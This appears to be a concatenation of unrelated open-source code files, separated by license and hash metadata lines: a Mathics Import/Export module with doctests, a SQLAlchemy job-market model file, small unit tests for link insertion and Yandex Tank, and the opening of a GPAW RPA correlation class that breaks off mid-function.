>> ExampleFormat1Import[filename_String] := Module[{stream, head, data}, stream = OpenRead[filename]; head = ReadList[stream, String, 2]; data = Partition[ReadList[stream, Number], 2]; Close[stream]; {"Header" -> head, "Data" -> data}]
'RegisterImport' is then used to register the above function to a new data format.
>> ImportExport`RegisterImport["ExampleFormat1", ExampleFormat1Import]
>> FilePrint["ExampleData/ExampleData.txt"]
| Example File Format
| Created by Angus
| 0.629452 0.586355
| 0.711009 0.687453
| 0.246540 0.433973
| 0.926871 0.887255
| 0.825141 0.940900
| 0.847035 0.127464
| 0.054348 0.296494
| 0.838545 0.247025
| 0.838697 0.436220
| 0.309496 0.833591
>> Import["ExampleData/ExampleData.txt", {"ExampleFormat1", "Elements"}]
= {Data, Header}
>> Import["ExampleData/ExampleData.txt", {"ExampleFormat1", "Header"}]
= {Example File Format, Created by Angus}
Conditional Importer:
>> ExampleFormat2DefaultImport[filename_String] := Module[{stream, head}, stream = OpenRead[filename]; head = ReadList[stream, String, 2]; Close[stream]; {"Header" -> head}]
>> ExampleFormat2DataImport[filename_String] := Module[{stream, data}, stream = OpenRead[filename]; Skip[stream, String, 2]; data = Partition[ReadList[stream, Number], 2]; Close[stream]; {"Data" -> data}]
>> ImportExport`RegisterImport["ExampleFormat2", {"Data" :> ExampleFormat2DataImport, ExampleFormat2DefaultImport}]
>> Import["ExampleData/ExampleData.txt", {"ExampleFormat2", "Elements"}]
= {Data, Header}
>> Import["ExampleData/ExampleData.txt", {"ExampleFormat2", "Header"}]
= {Example File Format, Created by Angus}
>> Import["ExampleData/ExampleData.txt", {"ExampleFormat2", "Data"}] // Grid
= 0.629452 0.586355
.
. 0.711009 0.687453
.
. 0.24654 0.433973
.
. 0.926871 0.887255
.
. 0.825141 0.9409
.
. 0.847035 0.127464
.
. 0.054348 0.296494
.
. 0.838545 0.247025
.
. 0.838697 0.43622
.
. 0.309496 0.833591
"""
context = 'ImportExport`'
attributes = ('Protected', 'ReadProtected')
# XXX OptionsIssue
options = {
'Path': 'Automatic',
'FunctionChannels': '{"FileNames"}',
'Sources': 'None',
'DefaultElement': 'Automatic',
'AvailableElements': 'None',
'Options': '{}',
'OriginalChannel': 'False',
'BinaryFormat': 'False',
'Encoding': 'False',
'Extensions': '{}',
'AlphaChannel': 'False',
}
rules = {
'ImportExport`RegisterImport[formatname_String, function_]':
'ImportExport`RegisterImport[formatname, function, {}]',
}
def apply(self, formatname, function, posts, evaluation, options):
'''ImportExport`RegisterImport[formatname_String, function_, posts_,
OptionsPattern[ImportExport`RegisterImport]]'''
if function.has_form('List', None):
leaves = function.get_leaves()
else:
leaves = [function]
if not (len(leaves) >= 1 and isinstance(leaves[-1], Symbol) and
all(x.has_form('RuleDelayed', None) for x in leaves[:-1])):
# TODO: Message
return Symbol('$Failed')
conditionals = {
elem.get_string_value(): expr for (elem, expr) in
(x.get_leaves() for x in leaves[:-1])}
default = leaves[-1]
posts = {}
IMPORTERS[formatname.get_string_value()] = (conditionals, default, posts, options)
return Symbol('Null')
class RegisterExport(Builtin):
"""
<dl>
<dt>'RegisterExport["$format$", $func$]'
<dd>register '$func$' as the default function used when exporting from a file of type '"$format$"'.
</dl>
Simple text exporter
>> ExampleExporter1[filename_, data_, opts___] := Module[{strm = OpenWrite[filename], char = data}, WriteString[strm, char]; Close[strm]]
>> ImportExport`RegisterExport["ExampleFormat1", ExampleExporter1]
>> Export["sample.txt", "Encode this string!", "ExampleFormat1"];
>> FilePrint["sample.txt"]
| Encode this string!
#> DeleteFile["sample.txt"]
Very basic encrypted text exporter
>> ExampleExporter2[filename_, data_, opts___] := Module[{strm = OpenWrite[filename], char}, (* TODO: Check data *) char = FromCharacterCode[Mod[ToCharacterCode[data] - 84, 26] + 97]; WriteString[strm, char]; Close[strm]]
>> ImportExport`RegisterExport["ExampleFormat2", ExampleExporter2]
>> Export["sample.txt", "encodethisstring", "ExampleFormat2"];
>> FilePrint["sample.txt"]
| rapbqrguvffgevat
#> DeleteFile["sample.txt"]
"""
context = 'ImportExport`'
options = {
'Path': 'Automatic',
'FunctionChannels': '{"FileNames"}',
'Sources': 'None',
'DefaultElement': 'None',
'AvailableElements': 'None',
'Options': '{}',
'OriginalChannel': 'False',
'BinaryFormat': 'False',
'Encoding': 'False',
'Extensions': '{}',
'AlphaChannel': 'False',
}
def apply(self, formatname, function, evaluation, options):
'''ImportExport`RegisterExport[formatname_String, function_,
OptionsPattern[ImportExport`RegisterExport]]'''
EXPORTERS[formatname.get_string_value()] = (function, options)
return Symbol('Null')
class FetchURL(Builtin):
'''
#> Quiet[FetchURL["https:////", {}]]
= $Failed
#> Quiet[FetchURL["http://mathics.org/url_test_case", {}]]
= $Failed
'''
messages = {
'httperr': '`1` could not be retrieved; `2`.',
}
def apply(self, url, elements, evaluation, options={}):
'FetchURL[url_String, elements_, OptionsPattern[]]'
import tempfile
import os
py_url = url.get_string_value()
temp_handle, temp_path = tempfile.mkstemp(suffix='')
try:
# some pages need cookies or they will end up in an infinite redirect (i.e. HTTP 303)
# loop, which prevents the page from getting loaded.
f = urllib2.build_opener(urllib2.HTTPCookieProcessor).open(py_url)
try:
if sys.version_info >= (3, 0):
content_type = f.info().get_content_type()
else:
content_type = f.headers['content-type']
os.write(temp_handle, f.read())
finally:
f.close()
# on some OS (e.g. Windows) all writers need to be closed before another
# reader (e.g. Import._import) can access it. so close the file here.
os.close(temp_handle)
def determine_filetype():
return mimetype_dict.get(content_type)
result = Import._import(temp_path, determine_filetype, elements, evaluation, options)
except HTTPError as e:
evaluation.message(
'FetchURL', 'httperr', url,
'the server returned an HTTP status code of %s (%s)' % (e.code, str(e.reason)))
return Symbol('$Failed')
except URLError as e: # see https://docs.python.org/3/howto/urllib2.html
if hasattr(e, 'reason'):
evaluation.message('FetchURL', 'httperr', url, str(e.reason))
elif hasattr(e, 'code'):
evaluation.message('FetchURL', 'httperr', url, 'server returned %s' % e.code)
return Symbol('$Failed')
except ValueError as e:
evaluation.message('FetchURL', 'httperr', url, str(e))
return Symbol('$Failed')
finally:
os.unlink(temp_path)
return result
class Import(Builtin):
"""
<dl>
<dt>'Import["$file$"]'
<dd>imports data from a file.
<dt>'Import["$file$", $elements$]'
<dd>imports the specified elements from a file.
<dt>'Import["http://$url$", ...]' and 'Import["ftp://$url$", ...]'
<dd>imports from a URL.
</dl>
#> Import["ExampleData/ExampleData.tx"]
: File not found during Import.
= $Failed
#> Import[x]
: First argument x is not a valid file, directory, or URL specification.
= $Failed
## CSV
#> Import["ExampleData/numberdata.csv", "Elements"]
= {Data, Grid}
#> Import["ExampleData/numberdata.csv", "Data"]
= {{0.88, 0.60, 0.94}, {0.76, 0.19, 0.51}, {0.97, 0.04, 0.26}, {0.33, 0.74, 0.79}, {0.42, 0.64, 0.56}}
#> Import["ExampleData/numberdata.csv"]
= {{0.88, 0.60, 0.94}, {0.76, 0.19, 0.51}, {0.97, 0.04, 0.26}, {0.33, 0.74, 0.79}, {0.42, 0.64, 0.56}}
#> Import["ExampleData/numberdata.csv", "FieldSeparators" -> "."]
= {{0, 88,0, 60,0, 94}, {0, 76,0, 19,0, 51}, {0, 97,0, 04,0, 26}, {0, 33,0, 74,0, 79}, {0, 42,0, 64,0, 56}}
## Text
>> Import["ExampleData/ExampleData.txt", "Elements"]
= {Data, Lines, Plaintext, String, Words}
>> Import["ExampleData/ExampleData.txt", "Lines"]
= ...
#> Import["ExampleData/Middlemarch.txt"];
: An invalid unicode sequence was encountered and ignored.
#> StringTake[Import["ExampleData/Middlemarch.txt", CharacterEncoding -> "ISO8859-1"], {21, 69}]
= Le sentiment de la fausseté des plaisirs présents
## JSON
>> Import["ExampleData/colors.json"]
= {colorsArray -> {{colorName -> black, rgbValue -> (0, 0, 0), hexValue -> #000000}, {colorName -> red, rgbValue -> (255, 0, 0), hexValue -> #FF0000}, {colorName -> green, rgbValue -> (0, 255, 0), hexValue -> #00FF00}, {colorName -> blue, rgbValue -> (0, 0, 255), hexValue -> #0000FF}, {colorName -> yellow, rgbValue -> (255, 255, 0), hexValue -> #FFFF00}, {colorName -> cyan, rgbValue -> (0, 255, 255), hexValue -> #00FFFF}, {colorName -> magenta, rgbValue -> (255, 0, 255), hexValue -> #FF00FF}, {colorName -> white, rgbValue -> (255, 255, 255), hexValue -> #FFFFFF}}}
## XML
#> Import["ExampleData/InventionNo1.xml", "Tags"]
= {accidental, alter, arpeggiate, ..., words}
"""
messages = {
'nffil': 'File not found during Import.',
'chtype': ('First argument `1` is not a valid file, directory, '
'or URL specification.'),
'noelem': (
'The Import element `1` is not present when importing as `2`.'),
'fmtnosup': '`1` is not a supported Import format.',
}
rules = {
'Import[filename_]': 'Import[filename, {}]',
}
def apply(self, filename, evaluation, options={}):
'Import[filename_, OptionsPattern[]]'
return self.apply_elements(filename, Expression('List'), evaluation, options)
def apply_element(self, filename, element, evaluation, options={}):
'Import[filename_, element_String, OptionsPattern[]]'
return self.apply_elements(filename, Expression('List', element), evaluation, options)
def apply_elements(self, filename, elements, evaluation, options={}):
'Import[filename_, elements_List?(AllTrue[#, NotOptionQ]&), OptionsPattern[]]'
# Check filename
path = filename.to_python()
if not (isinstance(path, six.string_types) and path[0] == path[-1] == '"'):
evaluation.message('Import', 'chtype', filename)
return Symbol('$Failed')
# Download via URL
if isinstance(filename, String):
if any(filename.get_string_value().startswith(prefix) for prefix in ('http://', 'https://', 'ftp://')):
return Expression('FetchURL', filename, elements, *options_to_rules(options))
# Load local file
findfile = Expression('FindFile', filename).evaluate(evaluation)
if findfile == Symbol('$Failed'):
evaluation.message('Import', 'nffil')
return findfile
def determine_filetype():
return Expression('FileFormat', findfile).evaluate(
evaluation=evaluation).get_string_value()
return self._import(findfile, determine_filetype, elements, evaluation, options)
@staticmethod
def _import(findfile, determine_filetype, elements, evaluation, options):
# Check elements
if elements.has_form('List', None):
elements = elements.get_leaves()
else:
elements = [elements]
for el in elements:
if not isinstance(el, String):
evaluation.message('Import', 'noelem', el)
return Symbol('$Failed')
elements = [el.get_string_value() for el in elements]
# Determine file type
for el in elements:
if el in IMPORTERS.keys():
filetype = el
elements.remove(el)
break
else:
filetype = determine_filetype()
if filetype not in IMPORTERS.keys():
evaluation.message('Import', 'fmtnosup', filetype)
return Symbol('$Failed')
# Load the importer
(conditionals, default_function, posts, importer_options) = IMPORTERS[filetype]
stream_options, custom_options = _importer_exporter_options(
importer_options.get("System`Options"), options, evaluation)
function_channels = importer_options.get("System`FunctionChannels")
if function_channels is None:
# TODO message
return Symbol('$Failed')
default_element = importer_options.get("System`DefaultElement")
if default_element is None:
# TODO message
return Symbol('$Failed')
def get_results(tmp_function):
if function_channels == Expression('List', String('FileNames')):
joined_options = list(chain(stream_options, custom_options))
tmp = Expression(tmp_function, findfile, *joined_options).evaluate(evaluation)
elif function_channels == Expression('List', String('Streams')):
stream = Expression('OpenRead', findfile, *stream_options).evaluate(evaluation)
if stream.get_head_name() != 'System`InputStream':
evaluation.message('Import', 'nffil')
return None
tmp = Expression(tmp_function, stream, *custom_options).evaluate(evaluation)
Expression('Close', stream).evaluate(evaluation)
else:
# TODO message
return Symbol('$Failed')
tmp = tmp.get_leaves()
if not all(expr.has_form('Rule', None) for expr in tmp):
return None
# return {a.get_string_value() : b for (a,b) in map(lambda x:
# x.get_leaves(), tmp)}
return dict((a.get_string_value(), b)
for (a, b) in [x.get_leaves() for x in tmp])
# Perform the import
defaults = None
if not elements:
defaults = get_results(default_function)
if defaults is None:
return Symbol('$Failed')
if default_element == Symbol("Automatic"):
return Expression('List', *(
Expression('Rule', String(key), defaults[key])
for key in defaults.keys()))
else:
result = defaults.get(default_element.get_string_value())
if result is None:
evaluation.message('Import', 'noelem', default_element,
from_python(filetype))
return Symbol('$Failed')
return result
else:
assert len(elements) == 1
el = elements[0]
if el == "Elements":
defaults = get_results(default_function)
if defaults is None:
return Symbol('$Failed')
# Use set() to remove duplicates
return from_python(sorted(set(
list(conditionals.keys()) + list(defaults.keys()) + list(posts.keys()))))
else:
if el in conditionals.keys():
result = get_results(conditionals[el])
if result is None:
return Symbol('$Failed')
if len(list(result.keys())) == 1 and list(result.keys())[0] == el:
return list(result.values())[0]
elif el in posts.keys():
# TODO: allow use of conditionals
result = get_results(posts[el])
if result is None:
return Symbol('$Failed')
else:
if defaults is None:
defaults = get_results(default_function)
if defaults is None:
return Symbol('$Failed')
if el in defaults.keys():
return defaults[el]
else:
evaluation.message('Import', 'noelem', from_python(el),
from_python(filetype))
return Symbol('$Failed')
class Export(Builtin):
"""
<dl>
<dt>'Export["$file$.$ext$", $expr$]'
<dd>exports $expr$ to a file, using the extension $ext$ to determine the format.
<dt>'Export["$file$", $expr$, "$format$"]'
<dd>exports $expr$ to a file in the specified format.
<dt>'Export["$file$", $exprs$, $elems$]'
<dd>exports $exprs$ to a file as elements specified by $elems$.
</dl>
## Invalid Filename
#> Export["abc.", 1+2]
: Cannot infer format of file abc..
= $Failed
#> Export[".ext", 1+2]
: Cannot infer format of file .ext.
= $Failed
#> Export[x, 1+2]
: First argument x is not a valid file specification.
= $Failed
## Explicit Format
#> Export["abc.txt", 1+x, "JPF"]
: {JPF} is not a valid set of export elements for the Text format.
= $Failed
#> Export["abc.txt", 1+x, {"JPF"}]
: {JPF} is not a valid set of export elements for the Text format.
= $Failed
## Empty elems
#> Export["123.txt", 1+x, {}]
= 123.txt
#> Export["123.jcp", 1+x, {}]
: Cannot infer format of file 123.jcp.
= $Failed
## Compression
## #> Export["abc.txt", 1+x, "ZIP"] (* MMA Bug - Export::type *)
## : {ZIP} is not a valid set of export elements for the Text format.
## = $Failed
## #> Export["abc.txt", 1+x, "BZIP"] (* MMA Bug - General::stop *)
## : {BZIP} is not a valid set of export elements for the Text format.
## = $Failed
## #> Export["abc.txt", 1+x, {"BZIP", "ZIP", "Text"}]
## = abc.txt
## #> Export["abc.txt", 1+x, {"GZIP", "Text"}]
## = abc.txt
## #> Export["abc.txt", 1+x, {"BZIP2", "Text"}]
## = abc.txt
## FORMATS
## Text
#> Export["abc.txt", 1 + x + y]
= abc.txt
#> FilePrint[%]
| 1 + x + y
#> DeleteFile[%%]
#> Export["abc.txt", "ä", CharacterEncoding -> "ISOLatin1"];
#> strm = OpenRead["abc.txt", BinaryFormat -> True];
#> BinaryRead[strm]
= 228
#> Close[strm];
#> DeleteFile["abc.txt"];
#> Export["abc.txt", "ä", CharacterEncoding -> "UTF-8"];
#> strm = OpenRead["abc.txt", BinaryFormat -> True];
#> BinaryRead[strm]
= 195
#> Close[strm];
#> DeleteFile["abc.txt"];
## CSV
#> Export["abc.csv", {{1, 2, 3}, {4, 5, 6}}]
= abc.csv
#> FilePrint[%]
| 1,2,3
| 4,5,6
#> DeleteFile[%%]
## SVG
#> Export["sine.svg", Plot[Sin[x], {x,0,1}]]
= sine.svg
#> FileFormat[%]
= SVG
#> DeleteFile[%%]
"""
messages = {
'chtype': "First argument `1` is not a valid file specification.",
'infer': "Cannot infer format of file `1`.",
'noelem': "`1` is not a valid set of export elements for the `2` format.",
}
_extdict = {
'bmp': 'BMP',
'gif': 'GIF',
'jp2': 'JPEG2000',
'jpg': 'JPEG',
'pcx': 'PCX',
'png': 'PNG',
'ppm': 'PPM',
'pbm': 'PBM',
'pgm': 'PGM',
'tif': 'TIFF',
'txt': 'Text',
'csv': 'CSV',
'svg': 'SVG',
}
rules = {
'Export[filename_, expr_, elems_?NotListQ]': (
'Export[filename, expr, {elems}]'),
}
def apply(self, filename, expr, evaluation, options={}):
"Export[filename_, expr_, OptionsPattern[]]"
# Check filename
if not self._check_filename(filename, evaluation):
return Symbol('$Failed')
# Determine Format
form = self._infer_form(filename, evaluation)
if form is None:
evaluation.message('Export', 'infer', filename)
return Symbol('$Failed')
else:
return self.apply_elements(filename, expr, String(form), evaluation, options)
def apply_element(self, filename, expr, element, evaluation, options={}):
'Export[filename_, expr_, element_String, OptionsPattern[]]'
return self.apply_elements(filename, expr, Expression('List', element), evaluation, options)
def apply_elements(self, filename, expr, elems, evaluation, options={}):
"Export[filename_, expr_, elems_List?(AllTrue[#, NotOptionQ]&), OptionsPattern[]]"
# Check filename
if not self._check_filename(filename, evaluation):
return Symbol('$Failed')
# Process elems {comp* format?, elem1*}
leaves = elems.get_leaves()
format_spec, elems_spec = [], []
found_form = False
for leaf in leaves[::-1]:
leaf_str = leaf.get_string_value()
if not found_form and leaf_str in EXPORTERS:
found_form = True
if found_form:
format_spec.append(leaf_str)
else:
elems_spec.append(leaf)
# Infer format if not present
if not found_form:
assert format_spec == []
format_spec = self._infer_form(filename, evaluation)
if format_spec is None:
evaluation.message('Export', 'infer', filename)
return Symbol('$Failed')
format_spec = [format_spec]
else:
assert format_spec != []
# First item in format_spec is the explicit format.
# The other elements (if present) are compression formats
if elems_spec != []: # FIXME: support elems
evaluation.message(
'Export', 'noelem', elems, String(format_spec[0]))
return Symbol('$Failed')
# Load the exporter
exporter_symbol, exporter_options = EXPORTERS[format_spec[0]]
stream_options, custom_options = _importer_exporter_options(
exporter_options.get("System`Options"), options, evaluation)
exporter_function = Expression(
exporter_symbol, filename, expr, *list(chain(stream_options, custom_options)))
if exporter_function.evaluate(evaluation) == Symbol('Null'):
return filename
return Symbol('$Failed')
def _check_filename(self, filename, evaluation):
path = filename.to_python()
if isinstance(path, six.string_types) and path[0] == path[-1] == '"':
return True
evaluation.message('Export', 'chtype', filename)
return False
def _infer_form(self, filename, evaluation):
ext = Expression('FileExtension', filename).evaluate(evaluation)
ext = ext.get_string_value().lower()
return self._extdict.get(ext)
class FileFormat(Builtin):
"""
<dl>
<dt>'FileFormat["$name$"]'
<dd>attempts to determine what format 'Import' should use to import specified file.
</dl>
>> FileFormat["ExampleData/sunflowers.jpg"]
= JPEG
## UTF-8 Unicode text
>> FileFormat["ExampleData/EinsteinSzilLetter.txt"]
= Text
>> FileFormat["ExampleData/lena.tif"]
= TIFF
## ASCII text
#> FileFormat["ExampleData/BloodToilTearsSweat.txt"]
= Text
#> FileFormat["ExampleData/MadTeaParty.gif"]
= GIF
#> FileFormat["ExampleData/moon.tif"]
= TIFF
#> FileFormat["ExampleData/numberdata.csv"]
= CSV
#> FileFormat["ExampleData/EinsteinSzilLetter.txt"]
= Text
#> FileFormat["ExampleData/BloodToilTearsSweat.txt"]
= Text
#> FileFormat["ExampleData/benzene.xyz"]
= XYZ
#> FileFormat["ExampleData/colors.json"]
= JSON
#> FileFormat["ExampleData/some-typo.extension"]
: File not found during FileFormat[ExampleData/some-typo.extension].
= $Failed
#> FileFormat["ExampleData/Testosterone.svg"]
= SVG
#> FileFormat["ExampleData/colors.json"]
= JSON
#> FileFormat["ExampleData/InventionNo1.xml"]
= XML
"""
messages = {
'nffil': 'File not found during `1`.',
}
detector = None
def apply(self, filename, evaluation):
'FileFormat[filename_String]'
findfile = Expression('FindFile', filename).evaluate(evaluation)
if findfile == Symbol('$Failed'):
evaluation.message(
'FileFormat', 'nffil', Expression('FileFormat', filename))
return findfile
path = findfile.get_string_value()
if not FileFormat.detector:
loader = magic.MagicLoader()
loader.load()
FileFormat.detector = magic.MagicDetector(loader.mimetypes)
mime = set(FileFormat.detector.match(path))
# If match fails match on extension only
if mime == set([]):
mime, encoding = mimetypes.guess_type(path)
if mime is None:
mime = set([])
else:
mime = set([mime])
result = []
for key in mimetype_dict.keys():
if key in mime:
result.append(mimetype_dict[key])
# the following fixes an extremely annoying behaviour on some (not all)
# installations of Windows, where we end up classifying .csv files als XLS.
if len(result) == 1 and result[0] == 'XLS' and path.lower().endswith('.csv'):
return String('CSV')
if len(result) == 0:
result = 'Binary'
elif len(result) == 1:
result = result[0]
else:
return None
return from_python(result)
| gpl-3.0 | -858,749,363,756,354,700 | 33.307223 | 575 | 0.570454 | false | 3.656114 | false | false | false |
kdurril/internaljobmarket | internaljobmarket/models_base.py | 1 | 8051 | from sqlalchemy import Column, Integer, String, ForeignKey, Table, UniqueConstraint, ForeignKeyConstraint
from sqlalchemy.orm import relationship
from internaljobmarket.database import Base
roleplay = '''
class Role(Base):
__tablename__ = "roles"
id = Column(Integer, primary_key=True)
name = Column(String(64), unique=True)
users = relationship("User", backref="role")
def __init__(self, name=None, users=None):
self.name = name
self.users = users
def __repr__(self):
return 'Role {0}'.format(self.name)
class User(Base):
__tablename__ = "users"
id = Column(Integer, primary_key=True)
username = Column(String(64), unique=True, index=True)
role_id = Column(Integer, ForeignKey("roles.id"))
def __init__(self, username=None, role_id=None):
self.username=username
self.role_id=role_id
def __repr__(self):
return 'User {0}'.format(self.name)
'''
class StudentModel(Base):
__tablename__ = 'student'
student_id = Column(Integer, primary_key=True)
studentUid = Column(String(9), unique=True)
nameLast = Column(String(120))
nameFirst = Column(String(120))
email = Column(String(120))
phone = Column(String(120))
major = Column(String(120))
programCode = Column(String(120))
semBegin = Column(String(120))
graduationExpected = Column(String(120))
creditFall = Column(Integer)
creditSpring = Column(Integer)
request201408 = Column(String(120))
request201501 = Column(String(120))
position = relationship("ApplicationModel", backref='StudentModel')
def __init__(self, student_id=None,
studentUid=None, nameLast=None,
nameFirst=None, email=None,
phone=None, major=None,
programCode=None, semBegin=None,
graduationExpected=None, creditFall=None,
creditSpring=None, request201408=None,
request201501=None):
self.student_id = student_id
self.studentUid = studentUid
self.nameLast = nameLast
self.nameFirst = nameFirst
self.email = email
self.phone = phone
self.major = major
self.programCode = programCode
self.semBegin = semBegin
self.graduationExpected = graduationExpected
self.creditFall = creditFall
self.creditSpring = creditSpring
self.request201408 = request201408
self.request201501 = request201501
def __repr__(self):
return '<Student {0}>'.format(self.studentUid)
class SupervisorModel(Base):
__tablename__ = 'supervisor'
supervisor_id = Column(Integer, primary_key=True)
nameLast = Column(String(120))
nameFirst = Column(String(120))
phone = Column(String(120))
email = Column(String(120))
room = Column(String(120))
center = Column(String(120))
position = relationship("PositionModel", backref='SupervisorModel')
def __init__(self, supervisor_id=None,
nameLast=None, nameFirst=None,
phone=None, email=None,
room=None, center=None
):
self.supervisor_id = supervisor_id
self.nameLast = nameLast
self.nameFirst = nameFirst
self.phone = phone
self.email = email
self.room = room
self.center = center
def __repr__(self):
return '<Supervisor {0}>'.format(self.supervisor_id)
class PositionModel(Base):
__tablename__ = 'position'
position_id = Column(Integer, primary_key=True)
title = Column(String(120))
workGroup = Column(String(120))
position_type = Column(String(120))
course = Column(String(120))
programMin = Column(String(120))
programStd = Column(String(120))
positionOverview = Column(String(120))
primaryDuties = Column(String(120))
necessarySkill = Column(String(120))
preferredSkill = Column(String(120))
dateOpen = Column(String(120))
dateClosed = Column(String(120))
available = Column(String(120))
supervisor_id = Column(Integer, ForeignKey("supervisor.supervisor_id"), nullable=False)
supervisor = relationship("ApplicationModel", backref='PositionModel')
superv = relationship("SupervisorModel", primaryjoin=supervisor_id == SupervisorModel.supervisor_id, viewonly=True)
#application = relationship("application", backref='position')
def __init__(self, position_id=None,
title=None, workGroup=None, position_type=None,
course=None, programMin=None, programStd=None,
positionOverview=None, primaryDuties=None,
necessarySkill=None, preferredSkill=None,
dateOpen=None, dateClosed=None,
available=None, supervisor_id=None):
self.position_id = position_id
self.title = title
self.workGroup =workGroup
self.position_type = position_type
self.course = course
self.programMin = programMin
self.programStd = programStd
self.positionOverview = positionOverview
self.primaryDuties = primaryDuties
self.necessarySkill = necessarySkill
self.preferredSkill = preferredSkill
self.dateOpen = dateOpen
self.dateClosed = dateClosed
self.available = available
self.supervisor_id = supervisor_id
def __repr__(self):
return '<Position {0}>'.format(self.position_id)
class ApplicationModel(Base):
'Many-to-many association table'
__tablename__ = 'app_main'
app_id = Column(Integer, primary_key=True)
position_id = Column(Integer, ForeignKey('position.position_id'), nullable=False)
student_id = Column(Integer, ForeignKey('student.student_id'), nullable=False)
student = relationship('StudentModel',primaryjoin=student_id == StudentModel.student_id)
offer = relationship('OfferModel', backref='AppilicationModel')
UniqueConstraint('position_id', 'student_id', name='unique_app')
def __init__(self, app_id=None,
student_id=None,
position_id=None):
self.app_id = app_id
self.position_id = position_id
self.student_id = student_id
def __repr__(self):
return '<Application {0}'.format(self.app_id)
class OfferModel(Base):
"This is a one-to-one from Application w/ Y or N"
#This can rely on the application id completely
__tablename__ = 'offer'
offer_id = Column(Integer, primary_key=True)
app_id = Column(Integer, ForeignKey('app_main.app_id'), nullable=False)
offerMade = Column(String(120))
offer_date = Column(String(120))
response = Column(String(120))
response_date = Column(String(120))
available = Column(String(120))
application = relationship('ApplicationModel',primaryjoin=app_id == ApplicationModel.app_id)
def __init__(self, offer_id=None, app_id=None,
offerMade=None, offer_date=None,
response=None, response_date=None,
available=None):
self.offer_id = offer_id
self.app_id = app_id
self.offerMade = offerMade
self.offer_date = offer_date
self.response = response
self.response_date = response_date
self.available = available
def __repr__(self):
return '<Offer {0}'.format(self.offer_id)
#The applications table is a many-to-many relationship
#https://pythonhosted.org/Flask-SQLAlchemy/models.html
#suggests using an explicit table
#http://docs.sqlalchemy.org/en/rel_0_9/orm/relationships.html#relationships-many-to-many
#http://docs.sqlalchemy.org/en/rel_0_9/core/constraints.html?highlight=constraints
#http://stackoverflow.com/questions/10059345/sqlalchemy-unique-across-multiple-columns
#This table should have a composite primary-key for student_id&position_id
#eliminates need for constraint should
#However, what if a person recinds an application and then reapplies?
#Do we allow this? if so, we need to add submission time/date stamp | gpl-2.0 | -719,030,571,077,346,300 | 36.451163 | 119 | 0.652962 | false | 3.874398 | false | false | false |
deployed/internal_links | internal_links/tests.py | 1 | 1317 | # encoding: utf-8
import unittest
from .helpers import insert_links_to_text, find_text_occurrences
class TestFindText(unittest.TestCase):
def test_find_text_occurrences(self):
text_dict = {'content': 'Ok, Ala ma kota, ala kota tez ma, ale ola nie ma kota tak jak ala'}
self.assertEqual(find_text_occurrences('Ala', text_dict)[0]['word'], 'Ala')
class TestInsertLinks(unittest.TestCase):
def setUp(self):
self.result_text = 'Ok, <a href="http://ala.com" alt="Ala" title="Ala">Ala</a> ma kota, ' \
'<a href="http://ala.com" alt="Ala" title="Ala">Ala</a> kota tez ma, ale ola nie ma kota ' \
'tak jak <a href="http://ala.com" alt="Ala" title="Ala">Ala</a>'
def test_insert_links_to_text(self):
text_dict = {'content': 'Ok, Ala ma kota, ala kota tez ma, ale ola nie ma kota tak jak ala',
'modified': False}
matches = [{'word': 'Ala', 'start': 4, 'end': 7},
{'word': 'Ala', 'start': 17, 'end': 20},
{'word': 'Ala', 'start': 62, 'end': 65}]
self.assertEqual(insert_links_to_text(text_dict, matches, "http://ala.com")['content'], self.result_text)
self.assertTrue(insert_links_to_text(text_dict, matches, "http://ala.com")['modified'])
| mit | 199,016,406,607,265,800 | 47.777778 | 119 | 0.579347 | false | 3.048611 | true | false | false |
direvius/yandex-tank | tests/TankCore_Test.py | 2 | 1254 | import unittest
from Tank_Test import TankTestCase
import yandextank.core as tankcore
class TankCoreTestCase(TankTestCase):
def setUp(self):
self.foo = tankcore.TankCore()
def tearDown(self):
del self.foo
self.foo = None
def test_tankcorefail(self):
paths = ['config_err/load_err.conf']
self.foo.load_configs(paths)
try:
self.foo.load_plugins()
self.fail()
except ImportError:
pass
def test_tankcore(self):
paths = ['config/load.conf']
self.foo.load_configs(paths)
self.assertEquals('passed', self.foo.get_option('dotted', 'test'))
self.foo.load_plugins()
self.foo.plugins_configure()
self.foo.plugins_prepare_test()
self.foo.plugins_start_test()
self.foo.wait_for_finish()
self.foo.add_artifact_file(__file__, 1)
self.foo.plugins_end_test(0)
self.foo.plugins_post_process(0)
def test_strstplit(self):
str1 = '-Jtarget.address=www.yandex.ru -Jtarget.port=26 -J "load_profile=const(1,60s) line(0,1000,10m)"'
arr1 = tankcore.splitstring(str1)
self.assertEquals(len(arr1), 5)
if __name__ == '__main__':
unittest.main()
| lgpl-2.1 | 8,863,918,829,289,162,000 | 26.866667 | 112 | 0.606061 | false | 3.335106 | true | false | false |
eklinger-UofA/3DOrthotics | orthotics_project/clients/views.py | 1 | 1074 | from django.shortcuts import render_to_response
from django.http import HttpResponse
from django.template import RequestContext
from clients.models import Client, Dependent
def index(request):
context = RequestContext(request)
client_list = Client.objects.all()
client_dict = {'clients': client_list}
return render_to_response('clients/index.html', client_dict, context)
def clientView(request, client_id):
context = RequestContext(request)
client = Client.objects.get(id=client_id)
insurance = client.insurance_set.all()
dependents = client.dependents.all()
spouse = None
children = []
for dependent in dependents:
if dependent.relationship == Dependent.SPOUSE:
spouse = dependent
else:
children.append(dependent)
context_dict = {'client': client,
'client_insurance': insurance,
'spouse': spouse,
'children': children}
print context_dict
return render_to_response('clients/client.html', context_dict, context)
| apache-2.0 | 3,895,278,928,022,930,000 | 30.588235 | 75 | 0.667598 | false | 4.195313 | false | false | false |
robwarm/gpaw-symm | gpaw/xc/rpa.py | 1 | 15513 | from __future__ import print_function
import os
import sys
from time import ctime
import numpy as np
from ase.units import Hartree
from ase.utils import devnull
from scipy.special.orthogonal import p_roots
from gpaw import GPAW
import gpaw.mpi as mpi
from gpaw.response.chi0 import Chi0
from gpaw.wavefunctions.pw import PWDescriptor
from gpaw.kpt_descriptor import KPointDescriptor
class RPACorrelation:
def __init__(self, calc, xc='RPA', filename=None,
skip_gamma=False, qsym=True, nlambda=None,
nfrequencies=16, frequency_max=800.0, frequency_scale=2.0,
frequencies=None, weights=None,
wcomm=None, chicomm=None, world=mpi.world,
txt=sys.stdout):
if isinstance(calc, str):
calc = GPAW(calc, txt=None, communicator=mpi.serial_comm)
self.calc = calc
if world.rank != 0:
txt = devnull
elif isinstance(txt, str):
txt = open(txt, 'w')
self.fd = txt
if frequencies is None:
frequencies, weights = get_gauss_legendre_points(nfrequencies,
frequency_max,
frequency_scale)
user_spec = False
else:
assert weights is not None
user_spec = True
self.omega_w = frequencies / Hartree
self.weight_w = weights / Hartree
if wcomm is None:
